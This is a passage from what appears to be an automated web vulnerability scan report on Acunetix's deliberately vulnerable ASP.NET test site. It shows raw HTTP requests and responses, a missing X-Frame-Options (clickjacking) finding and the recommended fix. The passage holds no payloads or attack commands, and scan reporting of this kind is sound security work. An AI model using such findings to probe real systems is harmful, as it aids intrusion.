XRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHNlY3VyaXR5IHRlY2hub2xvZ3kuIEZyb20gaW5kaXZpZHVhbCBjb25zdWx0YW50cyB0byBlbnRlcnByaXNlcywgcGVuZXRyYXRpb24gdGVzdGVycyBhbmQgc2VjdXJpdHkgZXhwZXJ0cyBnbG9iYWxseSBkZXBlbmQgb24gQWN1bmV0aXggcHJvZHVjdHMgYW5kIHRlY2hub2xvZ2llcy4gSXQgaXMgdGhlIHRvb2wgb2YgY2hvaWNlIGZvciBtYW55IGN1c3RvbWVycyBhY3Jvc3Mgc2VjdG9ycywgaW5jbHVkaW5nIEdvdmVybm1lbnQsIE1pbGl0YXJ5LCBFZHVjYXRpb24sIFRlbGVjb21tdW5pY2F0aW9ucywgQmFua2luZywgRmluYW5jZSwgYW5kIEUtQ29tbWVyY2Ugc2VjdG9ycyBhcyB3ZWxsIGFzIG1hbnkgRm9ydHVuZSA1MDAgY29tcGFuaWVzIHN1Y2ggYXMgdGhlIFBlbnRhZ29uLCBIYXJwZXIgQ29sbGlucywgRGlzbmV5LCBBZG9iZSwgYW5kIG1hbnkgbW9yZS48L3A+ZAIJDw8WAh4LTmF2aWdhdGVVcmwFEkNvbW1lbnRzLmFzcHg/aWQ9MGRkAgsPFgIeA3NyYwUMYWRzL2RlZi5odG1sZGTxtiNRXSWMk2xH7U3KJPX1k9tDKQ==" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLWjL6iDQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q+dfic04fJFrwdgOeBd3JBjK63E5g==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD vAlign="top">
          						<DIV id="divNewsDate" class="NewsDate">posted by <strong>admin                    </strong>5/16/2019 12:32:30 PM</DIV>
          						<DIV id="divNewsTitle" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</DIV>
          						<DIV id="divNewsLong" class="NewsLong"><p><strong>London, UK</strong> &ndash; <strong>May 2019</strong> &ndash; Acunetix, the pioneer in automated web application security software, has announced that all versions of the <a href=https://www.acunetix.com/vulnerability-scanner/>Acunetix Vulnerability Scanner</a> now support <a href=https://www.acunetix.com/vulnerability-scanner/network-security-scanner/>network security scanning</a>. Network security scans are possible thanks to the seamless integration of Acunetix with the powerful OpenVAS security solution. Until now, network security scanning functionality was available only in Acunetix Online.</p>     <p>&ldquo;No matter the size of your business, you use multiple security measures to alleviate different types of risks. Your security strategy must always include both web security scans and network security scans. And it makes it so much easier and much more efficient if you can do the two together using a single integrated tool,&rdquo; said Nicolas Sciberras, CTO.</p>     <p>There are many advantages of running network security scans in Acunetix. Having a single integrated dashboard with both web and network vulnerabilities gives the best possible risk visibility and saves a lot of time and effort. Network scans may also benefit from other Acunetix features, such as <a href=https://www.acunetix.com/vulnerability-scanner/acunetix-integrations/>issue tracker integration</a> and <a href=https://www.acunetix.com/vulnerability-scanner/vulnerability-management-regulatory-compliance/>comprehensive reporting</a>.</p>     <p><strong>More Features in the Latest Build</strong></p>     <p>OpenVAS integration is introduced as part of the latest Acunetix version 12 build (<a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>build 12.0.190515149</a>). This new build also includes:</p>     <p>- Support for IPv6<br />     - Improved usage of machine resources<br />     - Added support for Selenium scripts as import files<br />     - Multiple vulnerability checks for SAP<br />     - Unauthorized access detection for Redis and Memcached<br />     - Source code disclosure for Ruby and Python</p>     <p>The new build also includes a number of updates and fixes, all of which are available for both Windows and Linux. More information can be found <a href=https://www.acunetix.com/blog/releases/new-build-network-scanning-integration-ipv6-support/>here</a>.</p>     <p>Get a demo of the product <a href=https://www.acunetix.com/network-security-scanner/>here</a>.</p>     <p><strong>About Acunetix</strong></p>     <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise&rsquo;s ability to comprehensively manage, prioritize, and control vulnerability threats &ndash; ordered by business criticality.</p>     <p><strong>Acunetix, the Company</strong></p>     <p>Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader and a pioneer in automated web application security technology. From individual consultants to enterprises, penetration testers and security experts globally depend on Acunetix products and technologies. It is the tool of choice for many customers across sectors, including Government, Military, Education, Telecommunications, Banking, Finance, and E-Commerce sectors as well as many Fortune 500 companies such as the Pentagon, Harper Collins, Disney, Adobe, and many more.</p></DIV>
          						<TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0">
          							<TR>
          								<TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD>
          							</TR>
          							<TR>
          								<TD class="Comment" vAlign="middle">
          									<a id="hlComments" href="Comments.aspx?id=0">Read user comments</a></TD>
          							</TR>
          							<TR>
          								<TD vAlign="top"><IMG src="images/comment-after.gif"></TD>
          							</TR>
          						</TABLE>
          						<center>
          						<iframe id="adsFrame" src="ads/def.html" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe>
          						</center>
          					</TD>
          					<TD vAlign="top" width="200" colSpan="2">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          
          					</TD>
          				</TR>
          				<TR>
          					<TD colSpan="3"></TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Parameter
          X-Frame-Options
          Solution

          Most modern Web browsers support the X-Frame-Options HTTP header. Ensure it's set on all web pages returned by your site (if you expect the page to be framed only by pages on your server (e.g. it's part of a FRAMESET) then you'll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy's "frame-ancestors" directive.

        14. GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
          Alert tags
          Alert description

          X-Frame-Options header is not included in the HTTP response to protect against 'ClickJacking' attacks.

          Request
          Request line and header section (342 bytes)
          GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:18 GMT
          Content-Length: 30454
          
          
          Response body (30454 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>ReadNews</title>
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&amp;id=2" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYX